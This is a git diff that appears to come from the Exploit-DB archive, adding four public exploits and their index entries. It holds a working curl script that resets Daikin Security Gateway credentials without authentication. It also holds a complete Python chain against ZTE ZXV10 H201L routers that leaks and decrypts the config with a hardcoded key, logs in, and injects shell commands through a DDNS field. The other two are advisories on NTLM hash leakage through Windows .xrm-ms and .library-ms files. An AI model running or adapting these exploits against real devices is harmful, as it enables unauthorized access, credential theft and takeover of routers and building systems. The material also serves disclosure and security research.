diff --git a/exploits/multiple/local/52278.txt b/exploits/multiple/local/52278.txt new file mode 100644 index 000000000..60ef9da54 --- /dev/null +++ b/exploits/multiple/local/52278.txt @@ -0,0 +1,55 @@ +# Daikin Security Gateway 214 - Remote Password Reset +# Vendor: Daikin Industries, Ltd. +# Product web page: https://www.daikin.com +# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html +# Affected version: App: 100, Frm: 214 +# +# Summary: The Security gateway allows the iTM and LC8 controllers +# to connect through the Security gateway to the Daikin Cloud Service. +# Instead of sending the report to the router directly, the iTM or +# LC8 controller sends the report to the Security gateway first. The +# Security gateway transforms the report format from http to https +# and then sends the transformed https report to the Daikin Cloud +# Service via the router. Built-in LAN adapter enabling online control. +# +# Desc: The Daikin Security Gateway exposes a critical vulnerability +# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated +# attacker can send a crafted POST request to this endpoint, bypassing +# authentication mechanisms. Successful exploitation resets the system +# credentials to the default Daikin:Daikin username and password combination. +# This allows attackers to gain unauthorized access to the system without +# prior credentials, potentially compromising connected devices and networks. +# +# Tested on: fasthttp +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2025-5931 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php +# +# +# 21.03.2025 +# + +[ $# -ne 1 ] && { echo "Usage: $0 "; exit 1; } + +TARGET_IP="$1" +URL="https://$TARGET_IP/api/settings/password/reset" +PAYLOAD="t00t" + +[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; } + +RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null) + +[ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; } + +if [[ $RESPONSE =~ \"Error\":0 ]]; then + echo "Reset worked! Vulnerable." +elif [[ $RESPONSE =~ \"Error\":1 ]]; then + echo "Not vulnerable." +else + echo "Got: $RESPONSE" +fi \ No newline at end of file diff --git a/exploits/multiple/local/52279.py b/exploits/multiple/local/52279.py new file mode 100755 index 000000000..a091343f3 --- /dev/null +++ b/exploits/multiple/local/52279.py @@ -0,0 +1,303 @@ +# Exploit Title: ZTE ZXV10 H201L - RCE via authentication bypass +# Exploit Author: l34n (tasos meletlidis) +# https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/ + +import http.client, requests, os, argparse, struct, zlib +from io import BytesIO +from os import stat +from Crypto.Cipher import AES + +def login(session, host, port, username, password): + login_token = session.get(f"http://{host}:{port}/").text.split("getObj(\"Frm_Logintoken\").value = \"")[1].split("\"")[0] + + headers = { + "Content-Type": "application/x-www-form-urlencoded" + } + + data = { + "Username": username, + "Password": password, + "frashnum": "", + "Frm_Logintoken": login_token + } + + session.post(f"http://{host}:{port}/", headers=headers, data=data) + +def logout(session, host, port): + headers = { + "Content-Type": "application/x-www-form-urlencoded" + } + + data = { + "logout": "1", + } + + session.post(f"http://{host}:{port}/", headers=headers, data=data) + +def leak_config(host, port): + conn = http.client.HTTPConnection(host, port) + boundary = "----WebKitFormBoundarysQuwz2s3PjXAakFJ" + body = ( + f"--{boundary}\r\n" + 'Content-Disposition: form-data; name="config"\r\n' + "\r\n" + "\r\n" + f"--{boundary}--\r\n" + ) + + headers = { + "Content-Type": f"multipart/form-data; boundary={boundary}", + "Content-Length": str(len(body)), + "Connection": "close", + } + + conn.request("POST", "/getpage.gch?pid=101", body, headers) + response = conn.getresponse() + response_data = response.read() + + with open("config.bin", "wb") as file: + file.write(response_data) + + conn.close() + +def _read_exactly(fd, size, desc="data"): + chunk = fd.read(size) + if len(chunk) != size: + return None + return chunk + +def _read_struct(fd, fmt, desc="struct"): + size = struct.calcsize(fmt) + data = _read_exactly(fd, size, desc) + if data is None: + return None + return struct.unpack(fmt, data) + +def read_aes_data(fd_in, key): + encrypted_data = b"" + while True: + aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header") + if aes_hdr is None: + return None + _, chunk_len, marker = aes_hdr + + chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data") + if chunk is None: + return None + + encrypted_data += chunk + if marker == 0: + break + + cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB) + fd_out = BytesIO() + fd_out.write(cipher.decrypt(encrypted_data)) + fd_out.seek(0) + return fd_out + +def read_compressed_data(fd_in, enc_header): + hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6])) + if enc_header[6] != hdr_crc: + return None + + total_crc = 0 + fd_out = BytesIO() + + while True: + comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header") + if comp_hdr is None: + return None + uncompr_len, compr_len, marker = comp_hdr + + chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data") + if chunk is None: + return None + + total_crc = zlib.crc32(chunk, total_crc) + uncompressed = zlib.decompress(chunk) + if len(uncompressed) != uncompr_len: + return None + + fd_out.write(uncompressed) + if marker == 0: + break + + if enc_header[5] != total_crc: + return None + + fd_out.seek(0) + return fd_out + +def read_config(fd_in, fd_out, key): + ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header") + if ver_header_1 is None: + return + + ver_header_2_offset = 0x14 + ver_header_1[4] + + fd_in.seek(ver_header_2_offset) + ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header") + if ver_header_2 is None: + return + ver_header_3_offset = ver_header_2[10] + + fd_in.seek(ver_header_3_offset) + ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header") + if ver_header_3 is None: + return + signed_cfg_size = ver_header_3[3] + + file_size = stat(fd_in.name).st_size + + fd_in.seek(0x80) + sign_header = _read_struct(fd_in, ">3I", desc="signature header") + if sign_header is None: + return + if sign_header[0] != 0x04030201: + return + + sign_length = sign_header[2] + + signature = _read_exactly(fd_in, sign_length, desc="signature") + if signature is None: + return + + enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header") + if enc_header_raw is None: + return + encryption_header = struct.unpack(">15I", enc_header_raw) + if encryption_header[0] != 0x01020304: + return + + enc_type = encryption_header[1] + + if enc_type in (1, 2): + if not key: + return + fd_in = read_aes_data(fd_in, key) + if fd_in is None: + return + + if enc_type == 2: + enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header") + if enc_header_raw is None: + return + encryption_header = struct.unpack(">15I", enc_header_raw) + if encryption_header[0] != 0x01020304: + return + enc_type = 0 + + if enc_type == 0: + fd_in = read_compressed_data(fd_in, encryption_header) + if fd_in is None: + return + + fd_out.write(fd_in.read()) + +def decrypt_config(config_key): + encrypted = open("config.bin", "rb") + decrypted = open("decrypted.xml", "wb") + + read_config(encrypted, decrypted, config_key) + + with open("decrypted.xml", "r") as file: + contents = file.read() + username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0] + password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0] + + encrypted.close() + os.system("rm config.bin") + decrypted.close() + os.system("rm decrypted.xml") + + return username, password + +def command_injection(cmd): + injection = f"user;{cmd};echo " + injection = injection.replace(" ", "${IFS}") + return injection + +def set_ddns(session, host, port, payload): + headers = { + "Content-Type": "application/x-www-form-urlencoded" + } + + data = { + "IF_ACTION": "apply", + "IF_ERRORSTR": "SUCC", + "IF_ERRORPARAM": "SUCC", + "IF_ERRORTYPE": -1, + "IF_INDEX": None, + "IFservice_INDEX": 0, + "IF_NAME": None, + "Name": "dyndns", + "Server": "http://www.dyndns.com/", + "ServerPort": None, + "Request": None, + "UpdateInterval": None, + "RetryInterval": None, + "MaxRetries": None, + "Name0": "dyndns", + "Server0": "http://www.dyndns.com/", + "ServerPort0": 80, + "Request0": "", + "UpdateInterval0": 86400, + "RetryInterval0": 60, + "MaxRetries0": 3, + "Name1": "No-IP", + "Server1": "http://www.noip.com/", + "ServerPort1": 80, + "Request1": "", + "UpdateInterval1": 86400, + "RetryInterval1": 60, + "MaxRetries1": 3, + "Name2": "easyDNS", + "Server2": "https://web.easydns.com/", + "ServerPort2": 80, + "Request2": "", + "UpdateInterval2": 86400, + "RetryInterval2": 180, + "MaxRetries2": 5, + "Enable": 1, + "Hidden": None, + "Status": None, + "LastError": None, + "Interface": "IGD.WD1.WCD3.WCIP1", + "DomainName": "hostname", + "Service": "dyndns", + "Username": payload, + "Password": "password", + "Offline": None, + "HostNumber": "" + } + + session.post(f"http://{host}:{port}/getpage.gch?pid=1002&nextpage=app_ddns_conf_t.gch", headers=headers, data=data) + +def pwn(config_key, host, port): + session = requests.Session() + + leak_config(host, port) + username, password = decrypt_config(config_key) + + login(session, host, port, username, password) + + shellcode = "echo hacked>/var/tmp/pwned" + payload = command_injection(shellcode) + + set_ddns(session, host, port, payload) + + logout(session, host, port) + print("[+] PoC complete") + +def main(): + parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXV10 H201L") + parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"Renjx%2$CjM", help="Leaked config encryption key from cspd") + parser.add_argument("--host", required=True, help="Target IP address of the router") + parser.add_argument("--port", required=True, type=int, help="Target port of the router") + + args = parser.parse_args() + + pwn(args.config_key, args.host, args.port) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/52277.txt b/exploits/windows/local/52277.txt new file mode 100644 index 000000000..70152ae00 --- /dev/null +++ b/exploits/windows/local/52277.txt @@ -0,0 +1,104 @@ +# Exploit Author: John Page (aka hyp3rlinx) +# Website: hyp3rlinx.altervista.org +# Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt +# x.com/hyp3rlinx +# ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +.xrm-ms File Type + + +[Vulnerability Type] +NTLM Hash Disclosure (Spoofing) + + +[Video URL PoC] +https://www.youtube.com/watch?v=d5U_krLQbNY + + +[CVE Reference] +N/A + + +[Security Issue] +The Windows XRM-MS file type is related to Microsofts software licensing infrastructure. +C:\> assoc .xrm-ms=MSSppLicenseFile. + +An "xrm-ms" digital license file opens default (times a tickin) in Internet Explorer (MSIE) and on later OS versions switches to MS Edge. +The ".xrm-ms" file format allows injecting XML stylesheets that will then get processed, when a user opens it. +Adversaries can reference UNC paths for the stylesheet HREF tag that points to LAN network share or attacker controlled infrastructure. + +This results in an outbound connection to the attacker controlled network share and or server, leaking the target NTLM hash. +Works from both a LAN network share perspective or remote forced drive-by download to a target etc. User interaction is required to open the file. + +During testing, xrm-ms file type not blocked by Windows Office Outlook client 2016 and a popular Email Gateway Security product as of few days ago. + +Xrm-Ms File points: + +1) XRM-MS is not considered dangerous file type +2) Defaults to open in either MSIE or Edge Win7/10/11/Server 2019 +3) Default Icon as it is Windows browser may make it appear more "trust-worthy" +4) Throws no errors from the stylesheet directive when processed +5) May bypass some inbound email security inspections +6) No MOTW roadblocks +7) No active content security warnings + +Tested successfully in Win7/Win10/Server 2019 +Mileage may vary on Windows 11 and or recently updated systems. + +[Exploit/POC] + +Delivery options: +Drive-by force download +Email +Network Share +Archive .zip etc + + +1) Create .xrm-ms File with following content, adjust attacker server information. Actually, all you need is the one XML stylesheet to trigger it. + + + + + 12345-67890-ABCDE + Windows(R) Operating System, VOLUME_KMSCLIENT channel + XXXXX-XXXXX-XXXXX-XXXXX-XXXXX + + AA11BB22CC33DD44EE55 + + + 2024-01-01T00:00:00 + 2025-01-01T00:00:00 + + ... + + + +[Network Access] +Remote + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: April 17, 2025 +MSRC response: "report is a moderate spoofing and doesn't meet the bar." April 29, 2025 +April 30, 2025 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content copyright (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/52280.txt b/exploits/windows/local/52280.txt new file mode 100644 index 000000000..c119d94b3 --- /dev/null +++ b/exploits/windows/local/52280.txt @@ -0,0 +1,36 @@ +# Exploit title: Microsoft - NTLM Hash Disclosure Spoofing (library-ms) +# Exploit Author: John Page (aka hyp3rlinx) +# x.com/hyp3rlinx +# ISR: ApparitionSec + +Back in 2018, I reported a ".library-ms" File NTLM information disclosure vulnerability to MSRC and was told "it was not severe enough", that being said I post it anyways. +Seven years passed, until other researchers re-reported it. + +Subsequently this security flaw was finally deemed important by Microsoft and it received CVE-2025-24054, for which I was finally retroactively credited as the original reporter. + +Circa 2025 updated: +https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054 + +[References] +https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt +https://packetstorm.news/files/id/148556/ +https://cxsecurity.com/issue/WLB-2018070160 + +[Network Access] +Remote + +[Original Disclosure Timeline] +Vendor Notification: Jun 29, 2018 +MSRC Response: Jul 12, 2018 "risk is not severe enough to justify immediate servicing." +July 14, 2018 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content copyright (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6a04c2474..60be0aeed 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10453,6 +10453,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013 7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple,,2008-12-21,2017-01-05,1,CVE-2008-5377;OSVDB-50637,,,,, +52278,exploits/multiple/local/52278.txt,"Daikin Security Gateway 14 - Remote Password Reset",2025-05-01,LiquidWorm,local,multiple,,2025-05-01,2025-05-01,0,,,,,, 47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple,,2019-07-26,2019-07-26,0,,,,,,https://github.com/bcoles/local-exploits/blob/93082cc81cf9998a2aea1a48f8ddb8fe01a74a66/lastore-daemon-root/lastore-daemon-root.sh 19497,exploits/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2012-07-01,1,CVE-1999-0691;OSVDB-1071,,,,,https://www.securityfocus.com/bid/635/info 11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,, @@ -10604,6 +10605,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,, 51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,, 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz, +52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,, 32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info 24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info 22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info @@ -40991,6 +40993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 17502,exploits/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,local,windows,,2011-07-07,2011-07-07,1,OSVDB-73627;CVE-2010-5299,"Metasploit Framework (MSF)",,,http://www.exploit-db.commicrop_0.1.1.1600.zip, 14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,,2010-08-23,2010-08-24,1,OSVDB-73627;CVE-2010-5299,,,http://www.exploit-db.com/screenshots/idlt15000/14720.png,http://www.exploit-db.commicrop_0.1.1.1600.zip, 12213,exploits/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Local Privilege Escalation",2010-04-14,MJ0011,local,windows,,2010-04-13,,0,OSVDB-64951,,,,, +52280,exploits/windows/local/52280.txt,"Microsoft - NTLM Hash Disclosure Spoofing (library-ms)",2025-05-01,hyp3rlinx,local,windows,,2025-05-01,2025-05-01,0,CVE-2025-24054,,,,, 33892,exploits/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,local,windows,,2014-06-27,2014-06-27,1,CVE-2014-0257;OSVDB-103163;MS14-009,"Metasploit Framework (MSF)",,,, 14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,, 40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-12-04-at-205544.png,, @@ -41227,6 +41230,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40764,exploits/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",local,windows,,2016-11-15,2016-11-15,1,CVE-2016-7225;MS16-138,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=915 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,,2020-12-02,2020-12-02,0,,,,,, 46098,exploits/windows/local/46098.txt,"Microsoft Windows - Windows Error Reporting Local Privilege Escalation",2019-01-02,SandboxEscaper,local,windows,,2019-01-09,2019-01-09,0,,,,,,https://github.com/SandboxEscaper/randomrepo/blob/d3dbac51bf084c19064bb0f27fbcc800f2e6fe56/angrypolarbearbug.rar +52277,exploits/windows/local/52277.txt,"Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing",2025-05-01,hyp3rlinx,local,windows,,2025-05-01,2025-05-01,0,,,,,, 47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,,2020-01-01,2020-02-07,1,,,,,, 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,, 46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,,2019-05-23,2019-05-23,0,,,,,,https://github.com/SandboxEscaper/polarbearrepo/tree/763b757ead0ee8043a7edb5fdc2d437ae0f7b009/InstallerBypass